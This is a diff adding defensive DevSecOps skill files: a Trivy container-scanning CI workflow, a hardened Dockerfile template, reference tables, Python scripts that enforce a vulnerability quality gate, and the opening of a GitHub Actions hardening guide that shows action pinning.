+  build-scan-push:
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+      packages: write
+      security-events: write
+
+    steps:
+      - uses: actions/checkout@v4
+
+      - name: Set up Docker Buildx
+        uses: docker/setup-buildx-action@v3
+
+      - name: Build image
+        uses: docker/build-push-action@v6
+        with:
+          context: .
+          load: true
+          tags: ${{ env.IMAGE_NAME }}:scan
+          cache-from: type=gha
+          cache-to: type=gha,mode=max
+
+      - name: Cache Trivy DB
+        uses: actions/cache@v4
+        with:
+          path: /tmp/trivy
+          key: trivy-db-${{ github.run_id }}
+          restore-keys: trivy-db-
+
+      - name: Trivy vulnerability scan
+        uses: aquasecurity/trivy-action@0.28.0
+        with:
+          image-ref: ${{ env.IMAGE_NAME }}:scan
+          format: sarif
+          output: trivy-vuln.sarif
+          severity: CRITICAL,HIGH
+          exit-code: '1'
+          ignore-unfixed: true
+          cache-dir: /tmp/trivy
+
+      - name: Upload vulnerability SARIF
+        if: always()
+        uses: github/codeql-action/upload-sarif@v3
+        with:
+          sarif_file: trivy-vuln.sarif
+          category: trivy-vulnerabilities
+
+      - name: Trivy misconfiguration scan
+        uses: aquasecurity/trivy-action@0.28.0
+        with:
+          scan-type: config
+          scan-ref: .
+          format: sarif
+          output: trivy-config.sarif
+          severity: CRITICAL,HIGH
+          exit-code: '1'
+
+      - name: Upload config SARIF
+        if: always()
+        uses: github/codeql-action/upload-sarif@v3
+        with:
+          sarif_file: trivy-config.sarif
+          category: trivy-misconfigurations
+
+      - name: Generate SBOM
+        uses: aquasecurity/trivy-action@0.28.0
+        with:
+          image-ref: ${{ env.IMAGE_NAME }}:scan
+          format: cyclonedx
+          output: sbom.cdx.json
+
+      - name: Upload SBOM artifact
+        uses: actions/upload-artifact@v4
+        with:
+          name: sbom
+          path: sbom.cdx.json
+
+      - name: Login to GHCR
+        if: github.event_name == 'push'
+        uses: docker/login-action@v3
+        with:
+          registry: ${{ env.REGISTRY }}
+          username: ${{ github.actor }}
+          password: ${{ secrets.GITHUB_TOKEN }}
+
+      - name: Push image
+        if: github.event_name == 'push'
+        uses: docker/build-push-action@v6
+        with:
+          context: .
+          push: true
+          tags: |
+            ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:${{ github.sha }}
+            ${{ env.REGISTRY }}/${{ env.IMAGE_NAME }}:latest
+```
+
+## Trivy Ignore File Template
+
+```yaml
+# .trivyignore.yaml
+vulnerabilities:
+  # Accepted risk: mitigated at infrastructure level
+  - id: CVE-YYYY-NNNNN
+    statement: "Mitigated by WAF rules. Risk accepted by security team."
+    expires: 2026-12-31
+
+misconfigurations:
+  # Init containers require root
+  - id: DS002
+    paths:
+      - "docker/init/*.Dockerfile"
+    statement: "Init containers need root for volume permissions"
+```
+
+## Secure Dockerfile Template
+
+```dockerfile
+# syntax=docker/dockerfile:1
+
+# Build stage
+FROM python:3.12-slim-bookworm AS builder
+WORKDIR /build
+COPY requirements.txt .
+RUN pip install --no-cache-dir --prefix=/install -r requirements.txt
+
+# Production stage
+FROM python:3.12-slim-bookworm AS production
+
+# Security: Create non-root user
+RUN groupadd -r appuser && useradd -r -g appuser -s /bin/false appuser
+
+# Security: Install only runtime dependencies, remove cache
+RUN apt-get update && \
+    apt-get install -y --no-install-recommends \
+      libpq5 \
+    && rm -rf /var/lib/apt/lists/*
+
+# Copy installed packages from builder
+COPY --from=builder /install /usr/local
+
+# Copy application code
+WORKDIR /app
+COPY --chown=appuser:appuser src/ ./src/
+
+# Security: Run as non-root
+USER appuser
+
+# Health check
+HEALTHCHECK --interval=30s --timeout=3s --retries=3 \
+  CMD python -c "import urllib.request; urllib.request.urlopen('http://localhost:8080/health')" || exit 1
+
+EXPOSE 8080
+ENTRYPOINT ["python", "-m", "src.main"]
+```
+
+## Trivy Operator for Kubernetes
+
+```yaml
+# Install Trivy Operator via Helm
+# helm repo add aqua https://aquasecurity.github.io/helm-charts/
+# helm install trivy-operator aqua/trivy-operator \
+#   --namespace trivy-system --create-namespace \
+#   --set trivy.severity=CRITICAL,HIGH
+
+# Sample VulnerabilityReport CRD
+apiVersion: aquasecurity.github.io/v1alpha1
+kind: ClusterComplianceReport
+metadata:
+  name: cis-benchmark
+spec:
+  cron: "0 */6 * * *"
+  compliance:
+    id: cis
+    title: CIS Kubernetes Benchmark
+    platform: k8s
+```

--- a/security/skills/scanning-containers-with-trivy-in-cicd/references/api-reference.md
+++ b/security/skills/scanning-containers-with-trivy-in-cicd/references/api-reference.md
@@ -1,0 +1,57 @@
+# API Reference: Scanning Containers with Trivy in CI/CD
+
+## Trivy CLI Commands
+
+| Command | Description |
+|---------|-------------|
+| `trivy image <ref>` | Scan container image for vulnerabilities |
+| `trivy config <path>` | Scan Dockerfiles/IaC for misconfigurations |
+| `trivy fs <path>` | Scan filesystem for vulnerabilities |
+| `trivy sbom <file>` | Scan existing SBOM for vulnerabilities |
+| `trivy image --format sarif` | SARIF output for GitHub Security |
+| `trivy image --format cyclonedx` | CycloneDX SBOM generation |
+| `trivy image --exit-code 1` | Non-zero exit on findings |
+
+## Scan Options
+
+| Flag | Description |
+|------|-------------|
+| `--severity CRITICAL,HIGH` | Filter by severity level |
+| `--ignore-unfixed` | Skip CVEs without patches |
+| `--scanners vuln,misconfig,secret` | Select scanner types |
+| `--format json/sarif/cyclonedx` | Output format |
+| `--exit-code 1` | Fail pipeline on findings |
+| `--skip-db-update` | Use cached vulnerability DB |
+| `--cache-dir <path>` | Set database cache directory |
+
+## CI/CD Integration
+
+| Platform | Method |
+|----------|--------|
+| GitHub Actions | `aquasecurity/trivy-action@v0.28.0` |
+| GitLab CI | `aquasec/trivy:latest` Docker image |
+| Jenkins | Trivy CLI in pipeline script |
+| Azure DevOps | Trivy CLI task |
+
+## Quality Gate Severities
+
+| Level | CVSS Range | Default Gate Action |
+|-------|-----------|-------------------|
+| CRITICAL | 9.0 - 10.0 | Block deployment |
+| HIGH | 7.0 - 8.9 | Block deployment |
+| MEDIUM | 4.0 - 6.9 | Warn |
+| LOW | 0.1 - 3.9 | Allow |
+
+## Python Libraries
+
+| Library | Version | Purpose |
+|---------|---------|---------|
+| `subprocess` | stdlib | Execute trivy CLI |
+| `json` | stdlib | Parse scan results |
+| `pathlib` | stdlib | Output file management |
+
+## References
+
+- Trivy Documentation: https://trivy.dev/docs/
+- Trivy GitHub Action: https://github.com/aquasecurity/trivy-action
+- Trivy GitHub: https://github.com/aquasecurity/trivy

--- a/security/skills/scanning-containers-with-trivy-in-cicd/references/standards.md
+++ b/security/skills/scanning-containers-with-trivy-in-cicd/references/standards.md
@@ -1,0 +1,62 @@
+# Standards Reference: Container Scanning with Trivy
+
+## NIST SP 800-190 - Application Container Security Guide
+
+### Image Vulnerabilities (Section 3.1)
+- Scan all container images for known vulnerabilities before deployment
+- Establish organizational policies for maximum acceptable vulnerability severity
+- Monitor images in registries for newly discovered vulnerabilities
+- Maintain an up-to-date vulnerability database for scanning tools
+
+### Image Configuration Defects (Section 3.2)
+- Verify images follow CIS Docker Benchmark configuration guidelines
+- Ensure images run as non-root users unless operationally required
+- Remove unnecessary packages, shells, and utilities from production images
+
+## CIS Docker Benchmark v1.6.0
+
+### Image Level Controls
+- 4.1: Ensure a user for the container has been created (maps to Trivy DS002)
+- 4.2: Ensure containers use trusted base images
+- 4.3: Ensure unnecessary packages are not installed in the container
+- 4.6: Ensure HEALTHCHECK instructions have been added (maps to Trivy DS026)
+- 4.7: Ensure update instructions are not used alone in the Dockerfile
+- 4.9: Ensure COPY is used instead of ADD in Dockerfiles (maps to Trivy DS005)
+
+## OWASP Docker Security Cheat Sheet
+
+### Vulnerability Management
+- Scan images in the CI/CD pipeline before pushing to registries
+- Use `--ignore-unfixed` to focus on actionable vulnerabilities
+- Implement SBOM generation for full component visibility
+- Re-scan images on a schedule to catch newly published CVEs
+
+### Dockerfile Security
+- Use minimal base images (distroless, Alpine, slim variants)
+- Pin base image versions with digest for reproducibility
+- Run containers as non-root with explicit USER instruction
+- Use multi-stage builds to exclude build tools from production images
+
+## NIST SSDF (SP 800-218)
+
+### PW.4: Reuse Existing, Well-Secured Software
+- PW.4.1: Use automated tools to check for known vulnerabilities in dependencies
+- Map to Trivy's OS package and language dependency scanning capabilities
+
+### PS.1: Protect All Forms of Code
+- PS.1.1: Store all forms of code in a code repository protected by access controls
+- Container images in registries should be scanned and signed before use
+
+## SLSA Framework Alignment
+
+### Source Level
+- Trivy filesystem scanning validates source dependencies before build
+- Git repository scanning detects secrets and vulnerable dependencies in source
+
+### Build Level
+- Trivy image scanning validates the build output for vulnerabilities
+- SBOM generation creates a verifiable bill of materials for the built artifact
+
+### Deployment Level
+- Admission controllers can verify Trivy scan results before pod scheduling
+- Harbor registry integration enforces scan-before-pull policies

--- a/security/skills/scanning-containers-with-trivy-in-cicd/references/workflows.md
+++ b/security/skills/scanning-containers-with-trivy-in-cicd/references/workflows.md
@@ -1,0 +1,131 @@
+# Workflow Reference: Container Scanning with Trivy in CI/CD
+
+## Container Security Scanning Pipeline
+
+```
+Source Code Push
+       │
+       ▼
+┌──────────────────┐
+│ Build Docker      │
+│ Image             │
+└──────┬───────────┘
+       │
+       ├──────────────────────┐
+       ▼                      ▼
+┌──────────────┐    ┌──────────────┐
+│ Trivy Image  │    │ Trivy Config │
+│ Vuln Scan    │    │ Misconfig    │
+└──────┬───────┘    └──────┬───────┘
+       │                    │
+       ▼                    ▼
+┌──────────────┐    ┌──────────────┐
+│ SARIF/JSON   │    │ Table/JSON   │
+│ Output       │    │ Output       │
+└──────┬───────┘    └──────┬───────┘
+       │                    │
+       └──────────┬─────────┘
+                  ▼
+       ┌──────────────────┐
+       │ Quality Gate     │
+       │ Evaluation       │
+       └──────┬───────────┘
+              │
+    ┌─────────┴──────────┐
+    ▼                    ▼
+ PASS: Push to         FAIL: Block
+ Registry + Tag        + Alert Team
+       │
+       ▼
+┌──────────────┐
+│ Generate     │
+│ SBOM + Sign  │
+└──────────────┘
+```
+
+## Trivy Scan Types Reference
+
+### Image Scanning
+```bash
+# Full scan (OS + language packages)
+trivy image --severity CRITICAL,HIGH --exit-code 1 myimage:tag
+
+# OS packages only
+trivy image --vuln-type os myimage:tag
+
+# Language-specific packages only
+trivy image --vuln-type library myimage:tag
+
+# From Docker archive
+trivy image --input image.tar
+```
+
+### Filesystem Scanning
+```bash
+# Scan project directory for vulnerable dependencies
+trivy fs --severity HIGH,CRITICAL /path/to/project
+
+# Scan specific lockfile
+trivy fs --severity HIGH,CRITICAL requirements.txt
+```
+
+### Repository Scanning
+```bash
+# Scan remote git repository
+trivy repo https://github.com/org/repo
+
+# Scan specific branch
+trivy repo --branch develop https://github.com/org/repo
+```
+
+### Configuration Scanning
+```bash
+# Scan Dockerfile and Kubernetes manifests
+trivy config .
+
+# Scan Terraform files
+trivy config --tf-vars terraform.tfvars ./terraform/
+
+# Scan Helm charts
+trivy config ./charts/myapp/
+```
+
+## Output Format Options
+
+| Format | Use Case | Flag |
+|--------|----------|------|
+| table | Human-readable terminal output | `--format table` |
+| json | Programmatic processing and storage | `--format json` |
+| sarif | GitHub Security tab upload | `--format sarif` |
+| cyclonedx | SBOM generation (CycloneDX) | `--format cyclonedx` |
+| spdx-json | SBOM generation (SPDX) | `--format spdx-json` |
+| template | Custom report format | `--format template --template @template.tpl` |
+| cosign-vuln | Cosign attestation format | `--format cosign-vuln` |
+
+## Severity Threshold Matrix
+
+| Environment | Block On | Ignore Unfixed | Rationale |
+|-------------|----------|----------------|-----------|
+| Development | CRITICAL | Yes | Fast feedback, focus on worst issues |
+| Staging | CRITICAL, HIGH | Yes | Catch more issues before production |
+| Production | CRITICAL, HIGH | No | Full visibility even for unfixed CVEs |
+| Compliance | ALL | No | Complete audit trail required |
+
+## Database Management
+
+### Database Update Strategy
+```bash
+# Download DB only (for caching)
+trivy image --download-db-only --cache-dir /shared/trivy-cache
+
+# Skip DB update (use cached)
+trivy image --skip-db-update --cache-dir /shared/trivy-cache myimage:tag
+
+# Java DB for JAR scanning
+trivy image --download-java-db-only --cache-dir /shared/trivy-cache
+```
+
+### Cache Locations
+- Default: `~/.cache/trivy/`
+- CI override: `TRIVY_CACHE_DIR=/tmp/trivy-cache`
+- GitHub Actions: Use `actions/cache` with key based on date

--- a/security/skills/scanning-containers-with-trivy-in-cicd/scripts/agent.py
+++ b/security/skills/scanning-containers-with-trivy-in-cicd/scripts/agent.py
@@ -1,0 +1,170 @@
+#!/usr/bin/env python3
+"""Agent for scanning containers with Trivy in CI/CD pipelines.
+
+Runs Trivy vulnerability and misconfiguration scans against
+container images and Dockerfiles, enforces severity-based
+quality gates, and generates CI/CD-compatible reports.
+"""
+
+import json
+import subprocess
+import sys
+from pathlib import Path
+from datetime import datetime
+
+
+class TrivyCICDAgent:
+    """Integrates Trivy scanning into CI/CD workflows."""
+
+    def __init__(self, output_dir="./trivy_cicd"):
+        self.output_dir = Path(output_dir)
+        self.output_dir.mkdir(parents=True, exist_ok=True)
+        self.scan_results = []
+
+    def _run_trivy(self, subcmd, target, extra_args=None):
+        """Execute trivy CLI and return parsed results."""
+        cmd = ["trivy", subcmd, "--format", "json", "--quiet"]
+        if extra_args:
+            cmd.extend(extra_args)
+        cmd.append(target)
+        try:
+            result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
+            if result.stdout.strip():
+                return json.loads(result.stdout)
+            return {"error": result.stderr.strip() or "No output"}
+        except FileNotFoundError:
+            return {"error": "trivy not found. Install from https://trivy.dev"}
+        except subprocess.TimeoutExpired:
+            return {"error": "Trivy scan timed out after 600 seconds"}
+        except json.JSONDecodeError:
+            return {"error": "Failed to parse trivy JSON output"}
+
+    def scan_image(self, image_ref, severity="CRITICAL,HIGH", ignore_unfixed=True):
+        """Scan a container image for vulnerabilities."""
+        args = ["--severity", severity]
+        if ignore_unfixed:
+            args.append("--ignore-unfixed")
+        raw = self._run_trivy("image", image_ref, args)
+        if "error" in raw:
+            return raw
+
+        vulns = []
+        for result in raw.get("Results", []):
+            for v in result.get("Vulnerabilities", []):
+                vulns.append({
+                    "id": v.get("VulnerabilityID", ""),
+                    "severity": v.get("Severity", "UNKNOWN"),
+                    "package": v.get("PkgName", ""),
+                    "installed": v.get("InstalledVersion", ""),
+                    "fixed": v.get("FixedVersion", ""),
+                    "title": v.get("Title", ""),
+                })
+
+        summary = {}
+        for v in vulns:
+            summary[v["severity"]] = summary.get(v["severity"], 0) + 1
+
+        scan = {
+            "image": image_ref,
+            "scan_type": "vulnerability",
+            "scan_date": datetime.utcnow().isoformat(),
+            "total": len(vulns),
+            "summary": summary,
+            "vulnerabilities": vulns,
+        }
+        self.scan_results.append(scan)
+        return scan
+
+    def scan_config(self, path, severity="CRITICAL,HIGH"):
+        """Scan Dockerfiles or IaC for misconfigurations."""
+        args = ["--severity", severity]
+        raw = self._run_trivy("config", path, args)
+        if "error" in raw:
+            return raw
+
+        misconfigs = []
+        for result in raw.get("Results", []):
+            for mc in result.get("Misconfigurations", []):
+                misconfigs.append({
+                    "id": mc.get("ID", ""),
+                    "severity": mc.get("Severity", "UNKNOWN"),
+                    "title": mc.get("Title", ""),
+                    "message": mc.get("Message", ""),
+                    "resolution": mc.get("Resolution", ""),
+                })
+
+        scan = {
+            "path": path,
+            "scan_type": "misconfiguration",
+            "scan_date": datetime.utcnow().isoformat(),
+            "total": len(misconfigs),
+            "misconfigurations": misconfigs,
+        }
+        self.scan_results.append(scan)
+        return scan
+
+    def generate_sbom(self, image_ref, sbom_format="cyclonedx"):
+        """Generate an SBOM for a container image."""
+        out_file = self.output_dir / f"sbom.{sbom_format}.json"
+        cmd = ["trivy", "image", "--format", sbom_format,
+               "--output", str(out_file), image_ref]
+        try:
+            subprocess.run(cmd, capture_output=True, text=True, timeout=300)
+            return {"sbom_path": str(out_file)}
+        except (FileNotFoundError, subprocess.TimeoutExpired) as e:
+            return {"error": str(e)}
+
+    def enforce_quality_gate(self, severity_threshold="HIGH"):
+        """Check if any scan result exceeds the severity threshold."""
+        sev_order = ["CRITICAL", "HIGH", "MEDIUM", "LOW"]
+        threshold_idx = sev_order.index(severity_threshold) if severity_threshold in sev_order else 0
+        blocking_sevs = sev_order[:threshold_idx + 1]
+
+        for scan in self.scan_results:
+            summary = scan.get("summary", {})
+            for sev in blocking_sevs:
+                if summary.get(sev, 0) > 0:
+                    return {"gate": "FAILED", "reason": f"{summary[sev]} {sev} findings in {scan.get('image', scan.get('path', ''))}"}
+        return {"gate": "PASSED"}
+
+    def generate_report(self):
+        gate = self.enforce_quality_gate()
+        report = {
+            "report_date": datetime.utcnow().isoformat(),
+            "scans": self.scan_results,
+            "quality_gate": gate,
+        }
+        out = self.output_dir / "trivy_cicd_report.json"
+        with open(out, "w") as f:
+            json.dump(report, f, indent=2)
+        print(json.dumps(report, indent=2))
+        return report
+
+
+def main():
+    if len(sys.argv) < 2:
+        print("Usage: agent.py <image_ref> [--config <path>] [--severity CRITICAL,HIGH]")
+        sys.exit(1)
+
+    agent = TrivyCICDAgent()
+    image = sys.argv[1]
+    severity = "CRITICAL,HIGH"
+    if "--severity" in sys.argv:
+        idx = sys.argv.index("--severity")
+        if idx + 1 < len(sys.argv):
+            severity = sys.argv[idx + 1]
+
+    agent.scan_image(image, severity=severity)
+
+    if "--config" in sys.argv:
+        idx = sys.argv.index("--config")
+        if idx + 1 < len(sys.argv):
+            agent.scan_config(sys.argv[idx + 1], severity=severity)
+
+    report = agent.generate_report()
+    if report["quality_gate"]["gate"] == "FAILED":
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/scanning-containers-with-trivy-in-cicd/scripts/process.py
+++ b/security/skills/scanning-containers-with-trivy-in-cicd/scripts/process.py
@@ -1,0 +1,326 @@
+#!/usr/bin/env python3
+"""
+Trivy Container Scanning Pipeline Script
+
+Scans Docker images with Trivy, evaluates quality gates, generates reports,
+and optionally uploads results. Supports both local scanning and CI/CD integration.
+
+Usage:
+    python process.py --image myapp:latest --severity-threshold high
+    python process.py --image myapp:latest --output report.json --fail-on-findings
+    python process.py --dockerfile ./Dockerfile --scan-config
+"""
+
+import argparse
+import json
+import os
+import subprocess
+import sys
+from dataclasses import dataclass, field
+from datetime import datetime, timezone
+from typing import Optional
+
+
+SEVERITY_ORDER = {"CRITICAL": 0, "HIGH": 1, "MEDIUM": 2, "LOW": 3, "UNKNOWN": 4}
+
+
+@dataclass
+class Vulnerability:
+    vuln_id: str
+    pkg_name: str
+    installed_version: str
+    fixed_version: str
+    severity: str
+    title: str
+    description: str
+    cvss_score: float = 0.0
+    references: list = field(default_factory=list)
+
+
+@dataclass
+class Misconfiguration:
+    misconfig_id: str
+    title: str
+    severity: str
+    message: str
+    resolution: str
+    file_path: str = ""
+
+
+@dataclass
+class ScanResult:
+    image: str
+    vulnerabilities: list = field(default_factory=list)
+    misconfigurations: list = field(default_factory=list)
+    scan_duration: float = 0.0
+    db_version: str = ""
+    trivy_version: str = ""
+    error: str = ""
+
+
+def run_trivy_scan(image: str, severity: str = "CRITICAL,HIGH,MEDIUM,LOW",
+                   ignore_unfixed: bool = True, scan_type: str = "image",
+                   cache_dir: Optional[str] = None, skip_db_update: bool = False) -> dict:
+    """Execute Trivy scan and return JSON results."""
+    cmd = ["trivy", scan_type]
+
+    if scan_type == "image":
+        cmd.extend([
+            "--format", "json",
+            "--severity", severity,
+        ])
+        if ignore_unfixed:
+            cmd.append("--ignore-unfixed")
+        if cache_dir:
+            cmd.extend(["--cache-dir", cache_dir])
+        if skip_db_update:
+            cmd.append("--skip-db-update")
+        cmd.append(image)
+    elif scan_type == "config":
+        cmd.extend([
+            "--format", "json",
+            "--severity", severity,
+            image
+        ])
+
+    try:
+        proc = subprocess.run(
+            cmd,
+            capture_output=True,
+            text=True,
+            timeout=600
+        )
+
+        if proc.stdout:
+            return json.loads(proc.stdout)
+        else:
+            return {"error": proc.stderr[:500]}
+
+    except subprocess.TimeoutExpired:
+        return {"error": "Trivy scan timed out after 600 seconds"}
+    except FileNotFoundError:
+        return {"error": "trivy binary not found. Install from https://trivy.dev"}
+    except json.JSONDecodeError:
+        return {"error": "Failed to parse Trivy JSON output"}
+
+
+def parse_vulnerabilities(trivy_json: dict) -> list:
+    """Extract vulnerability findings from Trivy JSON output."""
+    vulns = []
+    for result in trivy_json.get("Results", []):
+        for vuln in result.get("Vulnerabilities", []):
+            vulns.append(Vulnerability(
+                vuln_id=vuln.get("VulnerabilityID", ""),
+                pkg_name=vuln.get("PkgName", ""),
+                installed_version=vuln.get("InstalledVersion", ""),
+                fixed_version=vuln.get("FixedVersion", ""),
+                severity=vuln.get("Severity", "UNKNOWN"),
+                title=vuln.get("Title", ""),
+                description=vuln.get("Description", "")[:300],
+                cvss_score=vuln.get("CVSS", {}).get("nvd", {}).get("V3Score", 0.0),
+                references=vuln.get("References", [])[:3]
+            ))
+    return vulns
+
+
+def parse_misconfigurations(trivy_json: dict) -> list:
+    """Extract misconfiguration findings from Trivy JSON output."""
+    misconfigs = []
+    for result in trivy_json.get("Results", []):
+        for mc in result.get("Misconfigurations", []):
+            if mc.get("Status") == "FAIL":
+                misconfigs.append(Misconfiguration(
+                    misconfig_id=mc.get("ID", ""),
+                    title=mc.get("Title", ""),
+                    severity=mc.get("Severity", "UNKNOWN"),
+                    message=mc.get("Message", ""),
+                    resolution=mc.get("Resolution", ""),
+                    file_path=result.get("Target", "")
+                ))
+    return misconfigs
+
+
+def generate_sarif(scan_result: ScanResult) -> dict:
+    """Generate SARIF format output for GitHub Security tab integration."""
+    rules = []
+    results = []
+    rule_ids_seen = set()
+
+    for vuln in scan_result.vulnerabilities:
+        if vuln.vuln_id not in rule_ids_seen:
+            rule_ids_seen.add(vuln.vuln_id)
+            severity_map = {"CRITICAL": "9.5", "HIGH": "7.5", "MEDIUM": "5.0", "LOW": "2.5"}
+            rules.append({
+                "id": vuln.vuln_id,
+                "shortDescription": {"text": vuln.title or vuln.vuln_id},
+                "fullDescription": {"text": vuln.description[:500]},
+                "properties": {
+                    "security-severity": str(vuln.cvss_score or severity_map.get(vuln.severity, "5.0")),
+                    "tags": ["security", "vulnerability", vuln.severity.lower()]
+                }
+            })
+
+        level_map = {"CRITICAL": "error", "HIGH": "error", "MEDIUM": "warning", "LOW": "note"}
+        results.append({
+            "ruleId": vuln.vuln_id,
+            "level": level_map.get(vuln.severity, "warning"),
+            "message": {
+                "text": f"{vuln.pkg_name} {vuln.installed_version} -> {vuln.fixed_version}: {vuln.title}"
+            },
+            "locations": [{
+                "physicalLocation": {
+                    "artifactLocation": {"uri": "Dockerfile"},
+                    "region": {"startLine": 1}
+                }
+            }]
+        })
+
+    return {
+        "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/main/sarif-2.1/schema/sarif-schema-2.1.0.json",
+        "version": "2.1.0",
+        "runs": [{
+            "tool": {
+                "driver": {
+                    "name": "Trivy",
+                    "informationUri": "https://trivy.dev",
+                    "rules": rules
+                }
+            },
+            "results": results
+        }]
+    }
+
+
+def evaluate_quality_gate(scan_result: ScanResult, threshold: str) -> dict:
+    """Evaluate whether scan results pass the quality gate."""
+    threshold_level = SEVERITY_ORDER.get(threshold.upper(), 1)
+
+    blocking_vulns = [
+        v for v in scan_result.vulnerabilities
+        if SEVERITY_ORDER.get(v.severity, 4) <= threshold_level
+    ]
+
+    blocking_misconfigs = [
+        m for m in scan_result.misconfigurations
+        if SEVERITY_ORDER.get(m.severity, 4) <= threshold_level
+    ]
+
+    severity_counts = {}
+    for v in scan_result.vulnerabilities:
+        severity_counts[v.severity] = severity_counts.get(v.severity, 0) + 1
+
+    return {
+        "passed": len(blocking_vulns) == 0 and len(blocking_misconfigs) == 0,
+        "threshold": threshold.upper(),
+        "total_vulnerabilities": len(scan_result.vulnerabilities),
+        "total_misconfigurations": len(scan_result.misconfigurations),
+        "blocking_vulnerabilities": len(blocking_vulns),
+        "blocking_misconfigurations": len(blocking_misconfigs),
+        "severity_counts": severity_counts,
+        "blocking_details": [
+            {"id": v.vuln_id, "pkg": v.pkg_name, "severity": v.severity,
+             "installed": v.installed_version, "fixed": v.fixed_version}
+            for v in blocking_vulns[:20]
+        ]
+    }
+
+
+def main():
+    parser = argparse.ArgumentParser(description="Trivy Container Scanning Pipeline")
+    parser.add_argument("--image", required=True, help="Docker image to scan (e.g., myapp:latest)")
+    parser.add_argument("--output", default="trivy-report.json", help="Output report file path")
+    parser.add_argument("--sarif-output", default=None, help="SARIF output file path")
+    parser.add_argument("--severity-threshold", default="high",
+                        choices=["critical", "high", "medium", "low"],
+                        help="Minimum severity to block pipeline")
+    parser.add_argument("--fail-on-findings", action="store_true",
+                        help="Exit non-zero if quality gate fails")
+    parser.add_argument("--ignore-unfixed", action="store_true", default=True,
+                        help="Ignore vulnerabilities without fixes")
+    parser.add_argument("--scan-config", action="store_true",
+                        help="Also scan for misconfigurations")
+    parser.add_argument("--dockerfile", default=None,
+                        help="Path to Dockerfile for misconfiguration scanning")
+    parser.add_argument("--cache-dir", default=None, help="Trivy cache directory")
+    parser.add_argument("--skip-db-update", action="store_true", help="Skip DB update")
+    args = parser.parse_args()
+
+    scan_result = ScanResult(image=args.image)
+    start_time = datetime.now(timezone.utc)
+
+    print(f"[*] Scanning image: {args.image}")
+    trivy_json = run_trivy_scan(
+        args.image,
+        ignore_unfixed=args.ignore_unfixed,
+        cache_dir=args.cache_dir,
+        skip_db_update=args.skip_db_update
+    )
+
+    if "error" in trivy_json:
+        print(f"[ERROR] {trivy_json['error']}")
+        sys.exit(2)
+
+    scan_result.vulnerabilities = parse_vulnerabilities(trivy_json)
+    scan_result.db_version = trivy_json.get("Metadata", {}).get("DB", {}).get("UpdatedAt", "unknown")
+
+    if args.scan_config and args.dockerfile:
+        print(f"[*] Scanning configuration: {args.dockerfile}")
+        config_path = os.path.dirname(args.dockerfile) or "."
+        config_json = run_trivy_scan(config_path, scan_type="config")
+        if "error" not in config_json:
+            scan_result.misconfigurations = parse_misconfigurations(config_json)
+
+    scan_result.scan_duration = (datetime.now(timezone.utc) - start_time).total_seconds()
+
+    quality_gate = evaluate_quality_gate(scan_result, args.severity_threshold)
+
+    report = {
+        "scan_metadata": {
+            "image": args.image,
+            "scan_date": datetime.now(timezone.utc).isoformat(),
+            "duration_seconds": scan_result.scan_duration,
+            "db_version": scan_result.db_version
+        },
+        "quality_gate": quality_gate,
+        "vulnerabilities": [
+            {
+                "id": v.vuln_id, "package": v.pkg_name, "severity": v.severity,
+                "installed": v.installed_version, "fixed": v.fixed_version,
+                "title": v.title, "cvss": v.cvss_score
+            }
+            for v in sorted(scan_result.vulnerabilities,
+                            key=lambda x: SEVERITY_ORDER.get(x.severity, 4))
+        ],
+        "misconfigurations": [
+            {"id": m.misconfig_id, "title": m.title, "severity": m.severity,
+             "message": m.message, "resolution": m.resolution}
+            for m in scan_result.misconfigurations
+        ]
+    }
+
+    with open(os.path.abspath(args.output), "w") as f:
+        json.dump(report, f, indent=2)
+    print(f"[*] Report: {os.path.abspath(args.output)}")
+
+    if args.sarif_output:
+        sarif = generate_sarif(scan_result)
+        with open(os.path.abspath(args.sarif_output), "w") as f:
+            json.dump(sarif, f, indent=2)
+        print(f"[*] SARIF: {os.path.abspath(args.sarif_output)}")
+
+    print(f"\n[*] Vulnerabilities: {len(scan_result.vulnerabilities)} "
+          f"| Misconfigs: {len(scan_result.misconfigurations)}")
+
+    if quality_gate["passed"]:
+        print(f"[PASS] Quality gate passed.")
+    else:
+        print(f"[FAIL] Quality gate failed. {quality_gate['blocking_vulnerabilities']} blocking vulns.")
+        for d in quality_gate["blocking_details"][:10]:
+            print(f"  - [{d['severity']}] {d['id']} in {d['pkg']} ({d['installed']} -> {d['fixed']})")
+
+    if args.fail_on_findings and not quality_gate["passed"]:
+        sys.exit(1)
+
+
+if __name__ == "__main__":
+    main()

--- a/security/skills/securing-github-actions-workflows/SKILL.md
+++ b/security/skills/securing-github-actions-workflows/SKILL.md
@@ -1,0 +1,263 @@
+---
+name: securing-github-actions-workflows
+description: 'This skill covers hardening GitHub Actions workflows against supply
+  chain attacks, credential theft, and privilege escalation. It addresses pinning
+  actions to SHA digests, minimizing GITHUB_TOKEN permissions, protecting secrets
+  from exfiltration, preventing script injection in workflow expressions, and implementing
+  required reviewers for workflow changes.
+
+  '
+domain: cybersecurity
+subdomain: devsecops
+tags:
+- devsecops
+- cicd
+- github-actions
+- supply-chain
+- workflow-security
+- secure-sdlc
+version: 1.0.0
+author: mahipal
+license: Apache-2.0
+nist_csf:
+- PR.PS-01
+- GV.SC-07
+- ID.IM-04
+- PR.PS-04
+mitre_attack:
+- T1195
+- T1554
+- T1059.004
+- T1068
+- T1548
+---
+
+# Securing GitHub Actions Workflows
+
+## When to Use
+
+- When GitHub Actions is the CI/CD platform and workflows need hardening against supply chain attacks
+- When workflows handle secrets, deploy to production, or have elevated permissions
+- When preventing script injection via untrusted PR titles, branch names, or commit messages
+- When requiring audit trails and approval gates for workflow modifications
+- When third-party actions pose supply chain risk through mutable version tags
+
+**Do not use** for securing other CI/CD platforms (see platform-specific hardening guides), for application vulnerability scanning (use SAST/DAST), or for secret detection in code (use Gitleaks).
+
+## Prerequisites
+
+- GitHub repository with GitHub Actions enabled
+- GitHub organization admin access for organization-level settings
+- Understanding of GitHub Actions workflow syntax and events
+
+## Workflow
+
+### Step 1: Pin Actions to SHA Digests
+
+```yaml
+# INSECURE: Mutable tag can be overwritten by attacker
+- uses: actions/checkout@v4
+
+# SECURE: Pinned to immutable SHA digest
+- uses: actions/checkout@b4ffde65f46336ab88eb53be808477a3936bae11  # v4.1.1
+
+# Use Dependabot to auto-update pinned SHAs
+# .github/dependabot.yml
+version: 2
+updates:
+  - package-ecosystem: "github-actions"
+    directory: "/"
